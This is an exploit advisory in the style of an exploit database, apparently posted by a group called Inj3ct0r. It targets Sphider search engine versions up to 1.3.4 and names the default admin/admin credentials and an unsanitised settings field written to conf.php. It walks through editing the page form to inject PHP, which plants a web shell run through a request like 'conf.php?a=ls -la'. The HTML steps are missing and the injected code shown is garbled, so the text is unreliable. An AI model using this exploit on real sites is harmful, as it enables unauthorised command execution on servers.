=============================== [sphider] <= 1.3.4 adding shell =============================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1 #[+] Discovered By : Inj3ct0r #[+] Site : Inj3ct0r.com #[+] support e-mail : submit[at]inj3ct0r.com [~] Username and pass are stored in: http://site.com/sphider/admin/auth.php Default: PHP code: error_reporting(E_ERROR | E_PARSE); $admin = "admin"; $admin_pw = "admin"; [~] filled shells. Vulnerable code: PHP code: if ($_index_pdf=="") { $_index_pdf=0; } ... fwrite($fhandle, "\n\n// Index pdf files\n"); fwrite($fhandle,"$"."index_pdf = ".$_index_pdf. ";"); The easiest is to do opera. Go to Source and change this: HTML code: so HTML code: Save your settings. As a result, we have: PHP code: // Index pdf files $index_pdf = 0; echo($_GET[a]); http://site.com/sphider/settings/conf.php?a=ls -la ThE End =] Visit my proj3ct : http://inj3ct0r.com http://inj3ct0r.org http://inj3ct0r.net # ~ - [ [ : Inj3ct0r : ] ]